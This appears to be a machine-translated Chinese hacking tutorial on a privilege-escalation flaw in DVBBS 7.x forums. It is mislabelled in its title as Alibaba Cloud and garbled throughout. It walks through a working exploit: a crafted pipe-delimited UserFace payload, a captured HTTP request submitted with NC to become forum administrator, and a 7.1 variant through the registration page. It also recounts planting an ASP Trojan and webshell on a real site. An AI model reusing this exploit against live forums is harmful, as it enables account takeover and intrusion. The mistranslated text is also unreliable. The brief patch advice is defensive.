How does one improve the permissions of Alibaba Cloud v5.x

On the anti-DDOS service in February June, I saw the article "discovering the vulnerabilities of mobile network 7.1", saying that the admin_postings.asp file has an injection vulnerability, but the premise is that it has the permissions of a super moderator or front-end administrator. I think that the previously discovered Mobile 7. x version has a front-end permission escalation vulnerability, which can be used together. This front-end privilege escalation vulnerability is valid for both Access and SQL versions of 7.x. Next we will explain how to exploit this vulnerability with 7.0 SP2 SQL.

Vulnerability Analysis:

We know that the dynamic network uses the GroupID to determine the group where the current user is located, and then the group information to determine the user's permissions. How does it obtain this GroupID? Let's take a look at the login verification section: About 525 lines of login. asp:

Rem ========= Forum login function ==========

Rem determines User Logon

Function ChkUserLogin (username, password, mobile, userCookies, ctype)

............ The previous code is omitted.

SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex, UserFace

, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID, UserGroup,

UserWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest, UserHidden,

UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday"

SQL = SQL + "From [Dv_User] Where" & SQLstr &""

Set rsUser = DVBBS. Execute (SQL)

If rsUser. eof and rsUser. bof Then

ChkUserLogin = false

Exit Function

Else

IMyUserInfo = rsUser. GetString (, 1, "| ","","")

RsUser. Close: Set rsUser = Nothing

End If

IMyUserInfo = "DVBBS |" & Now & "|" & Now & "|" & DVBBS. BoardID & "| "&

IMyUserInfo & "| DVBBS"

IMyUserInfo = Split (iMyUserInfo, "| ")

If trim (password) <> trim (iMyUserInfo (6) Then

ChkUserLogin = false

ElseIf iMyUserInfo (17) = 1 Then

ChkUserLogin = false

ElseIf iMyUserInfo (19) = 5 Then

ChkUserLogin = false

Else

ChkUserLogin = True

Session (DVBBS. CacheName & "UserID") = iMyUserInfo

DVBBS. UserID = iMyUserInfo (4)

RegName = iMyUserInfo (5)

Article = iMyUserInfo (8)

UserLastLogin = iMyUserInfo (15)

UserClass = iMyUserInfo (18)

GroupID = iMyUserInfo (19)

TitlePic = iMyUserInfo (34)

If Article <0 Then Article = 0

End If

............ The code below is omitted

As you can see, the mobile network connects user information with "|" as a string and passes it to iMyUserInfo. Then, iMyUserInfo is separated by "|" into a string array. After the user password is verified correctly, the value of the first element of the array: iMyUserInfo (19) is assigned to the GroupID. No. The GroupID is only the value of the 20th elements corresponding to the array. If the value of iMyUserInfo (19) is 1, the current logon user is the front-end administrator.

In the Dv_ClsMain.asp file under the inc directory, there is also a piece of code to verify the user's identity, which is used to detect the user's permissions after the user updates information.

About 650 rows of Dv_ClsMain.asp

Public Sub TrueCheckUserLogin ()

...... Omitted

Dim Rs, SQL

SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex,

UserFace, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID,

UserGroup, userWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest,

UserHidden, UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday"

SQL = SQL + "From [Dv_User] Where UserID =" & UserID

Set Rs = Execute (SQL)

If Rs. Eof And Rs. Bof Then

Rs. Close: Set Rs = Nothing

UserID = 0

EmptyCookies

LetGuestSession ()

Else

MyUserInfo = Rs. GetString (, 1, "| ","","")

Rs. Close: Set Rs = Nothing

If IsArray (Session (CacheName & "UserID") Then

MyUserInfo = "DVBBS |" & Now & "|" & Session (CacheName & "UserID") (2) & "|" & BoardID & "|" & MyUserInfo & "| DVBBS"

Else

MyUserInfo = "DVBBS |" & Now & "|" & DateAdd ("s",-3600, Now ()) & "|" & BoardID & "|" & MyUserInfo & "| DVBBS"

End IF

Response. Write MyUserInfo

MyUserInfo = Split (MyUserInfo, "| ")

......

End If

End Sub

After a user logs on successfully, this function is used to read the user group and determine some common information.

Public Sub GetCacheUserInfo ()

MyUserInfo = Session (CacheName & "UserID ")

UserID = Clng (MyUserInfo (4 ))

MemberName = MyUserInfo (5)

Lastlogin = MyUserInfo (15)

If Not IsDate (LastLogin) Then LastLogin = Now ()

UserGroupID = Cint (MyUserInfo (19 ))

...... Code omitted later

The two tests are the same, so we can use either of them to achieve our goal. View its SQL statement section:

SQL = "Select UserID, UserName, UserPassword, UserEmail, UserPost, UserTopic, UserSex, UserFace, UserWidth, UserHeight, JoinDate, LastLogin, UserLogins, Lockuser, Userclass, UserGroupID, UserGroup, userWealth, userEP, userCP, UserPower, UserBirthday, UserLastIP, UserDel, UserIsBest, UserHidden, UserMsg, IsChallenge, UserMobile, TitlePic, UserTitle, TruePassWord, UserToday"

SQL = SQL + "From [Dv_User] Where UserID =" & UserID

UserGroupID has 16th fields. As long as the data in the previous field contains "|", the position of UserGroupID in the string array of MyUserInfo is changed. There are some special requirements for selecting this field. The field type should be appropriate, not numeric, and the field length should be able to accommodate the array we constructed, in addition, it must be the field preceding UserGroupID in the preceding SQL statement, so that the constructed array can change the location of UserGroupID in the original array. 1.

We can only use the UserEmail and UserFace fields. Because of the existence of the IsValidEmail function, we cannot insert '|' in the UserEmail field, so we can only use the UserFace field.

When modifying the basic information, the mobile network only filters the symbols used for SQL injection, but does not filter '|'. Therefore, if we construct the correct string, we can cheat the mobile network, become a user in the Administrator group.

Face = Dv_FilterJS (replace (face ,"",""))

Face = Replace (face ,"..","")

Face = Replace (face ,"\","/")

Face = Replace (face, "^ ","")

Face = Replace (face ,"#","")

Face = Replace (face, "% ","")

Vulnerability exploitation:

How to construct this UserFace to achieve our goal? At first, I thought that as long as iMyUserInfo (19) is 1, it could be an administrator, but it never succeeded. In fact, when constructing this UserFace, we also need to consider that we have changed the structure of the iMyUserInfo array. We must ensure that the structure of the first part of the new iMyUserInfo array is the same as that of the original array, otherwise, a type conversion error occurs, such as UserBirthday. In the new array, the value of this field must be a date. We can directly use the second half of a normal iMyUserInfo as our UserFace value, and then change the location of UserGroupID to one. I modified the login. asp file so that it displays the current user's iMyUserInfo Content During User Logon, as shown in figure 2.

For example, the value of iMyUserInfo at logon is:

DVBBS | 2005-6-1918: 05: 34 | 18:05:34 | 0 | 1 | admin | 469e80d32c0559f8 |

Eway@aspsky.net | 4 | 1 | 0 | images/userface/image1.gif | 32 | 32 | 16:34:00 | 2005-6 -1918: 04: 06 | 25 | 0 | administrator | 1 | 120 | 115 | 28 | 0 | | 210.41.235.200

| 0 | 0 | 0 | 0 | level10.gif | 9pc722664t5w7IM7 | 0 | 0 | 0 | DVBBS

We can

Images/userface/image1.gif | 32 | 32 | 16:34:00 | 18:04:06 | 25 | 0 | administrator | 1 | | 120 | 115 | 28 | 0 | 210.41.235.200 | 0 | 0 | 0 | 0 | | 0 | level10.gif | 9pc722664t5w7IM7 | 0 | 0 | 0 | DVBBS

Make sure that the length of the UserFace value cannot exceed 255 characters. The mobile network limits the number of characters that we submit to 100. We can use NC to submit.

First, test it on the local machine and log on to the Internet with a common user. Now the user level is still new.

Now, let's modify the basic information.

Submit. Use WSE to capture this package.

The captured package is as follows:

POST/bs/mymodify. asp? Action = updat & username = 4 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*

Referer: http: // 210.41.235.199/bs/mymodify. asp Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie;. net clr 1.1.4322)

Host: 210.41.235.199 Content-Length: 396 Connection: Keep-Alive Cache-Control: no-cache Cookie: 210% 2E41% 2E235% 2E199% 2Fbs % 2F = userCookies = 0 & StatUserID = 21048347059 & password = fVIy4l887ZvD956c & userhidden = & username = test & userclass = % D0 % C2 % CA % D6 % C9 % CF % C2 % B7 & userid = 4; upNum = 0; ASPSESSIONIDASCDABTA = IEGHDLKCCHDMOBPFPFFHMNAM

California & width = 32 & height = 32 & birthday = & userphoto = & GroupName = % CE % DE % C3 % C5 % CE % DE % C5 % C9 & Signature = & showRe = 0 & userCookies = 0 & setuserinfo = 1 & setusertrue = 0 & realname = & personal = & country = & userphone = & address = & province = & selectp = 0 & city = & selectc = 0 & shengxiao = & blood = & belief = & occupation = & marfound = & education = & college = & Submit = % B8 % FC + % D0 % C2

Okay. Replace the userface value

Images/userface/image1.gif | 32 | 32 | 2003-12-30% 6:6:34:00 | % 8:8:006 | 25 | 0 | administrator | 1 | 120 | 115 | 28 | 0 | 210.41.235.200 | 0 | 0 | 0 | 0 | | 0 | level10.gif |

9pc722664t5w7IM7 | 0 | 0 | DVBBS

Note that replace the space in the middle with % 20, re-calculate the Content-Length value, and submit it with NC once. Our user's userface will be replaced. Now, log on again.

Haha, have you seen it? We are already administrators. You can add a background administrator by using the vulnerability in Section 6 "7.1 vulnerabilities.

How to use dynamic network 7.1:

The method to exploit this vulnerability in the 7.1 version of the mobile network is slightly changed, and the difficulty is also higher than that of the 7.0 SP2 version. Version 7.1 adds the '|' symbol to the face variable.

Near line 270 in the mymodify. asp file:

Face = Dv_FilterJS (Replace (face ,"",""))

Face = Replace (face ,"..","")

Face = Replace (face ,"\","/")

Face = Replace (face, "^ ","")

Face = Replace (face ,"#","")

Face = Replace (face, "% ","")

Face = Replace (face, "| ","")

It is a pity that the mobile network programmer is very confidential and can modify the profile picture when registering. In reg. asp, no filter is performed on the face variable. Reg. asp file is near line 285.

If Request. form ("face") <> "Then

Face = Request. form ("face ")

End If

Similarly, capture the packet first and submit it with NC. After registering and logging on, you will be the front-end administrator. But another problem is Truepassword. 7.1 enhances the prevention of Cookie spoofing, so this truepassword changes too frequently. In newpass. asp of SP2 SP2, there is only one command to update the current user's turepassword:

Newpass. asp file of 7.0 SP2

An error occurred while processing the SSI File

An error occurred while processing the SSI File

<%

DVBBS. NewPassword0 ()

%>

In 7.1, newpass. asp also checks whether the user's Cookies are updated. 7.1about 30 lines of newpass.asp File

Check whether the write is successful. If yes, update the data.

If DVBBS. checkStr (Trim (Request. Cookies (DVBBS. Forum_sn) ("password") = TruePassWord Then

DVBBS. Execute ("UpDate [Dv_user] Set TruePassWord =" & TruePassWord & "where UserID =" & DVBBS. UserID)

DVBBS. MemberWord = TruePassWord

Dim iUserInfo

IUserInfo = Session (DVBBS. CacheName & "UserID ")

IUserInfo (35) = TruePassWord

Session (DVBBS. CacheName & "UserID") = iUserInfo

End If

In 7.1, truepassword in Cookies on our client is updated to a new truepassword. Because truepassword on the server is also obtained from MyUserInfo, The truepassword value in MyUserInfo will not change, an endless loop is formed during detection. Our solution is to use Cookies to lock our Cookies, and use the browser of Guilin veterans to lock our Cookies. We had to set the truepassword value in Cookies to be consistent with the truepassword value in MyUserInfo. In this way, newpass. asp will not be repeatedly requested to enter an endless loop.

Because there is no SQL version 7.1 code in hand, the above is tested in Access Version 7.1, and can be successfully used as the front-end administrator.

Postscript:

How to Prevent vulnerabilities: The project for modifying the database structure is too large. We recommend that you add the '|' symbol of the corresponding variable to reg. asp and mymodify. asp to filter out the vulnerabilities, for example:

Face = Dv_FilterJS (Replace (face ,"",""))

Face = Replace (face ,"..","")

Face = Replace (face ,"\","/")

Face = Replace (face, "^ ","")

Face = Replace (face ,"#","")

Face = Replace (face, "% ","")

Face = Replace (face, "| ","")

I also want to mention that the mobile network trusts the background administrator too much, so it does not prevent SQL Injection in many places in the background, this is like opening the door to SQL injection. A website we once detected is very BT. The above uses the DVBBS forum. When we obtained the DVBBS background administrator privilege, we found that the upload directory has no execution permission, and the asp Trojan is uploaded and returned as is. The directory for executing asp permissions does not have the write permission. There are no other sites on the website that can be injected. Later I found that the DVBBS background was injected before I finally got a pony. It's a treasure of a thousand miles.

This permission escalation vulnerability is not very advanced, but the consequences are very serious. Because SQL Injection exists on multiple pages managed by the front-end, this vulnerability is very harmful to DVBBS 7.x SQL. Do not use the methods described in this document to conduct destructive actions. Otherwise, the consequences will be borne by yourself.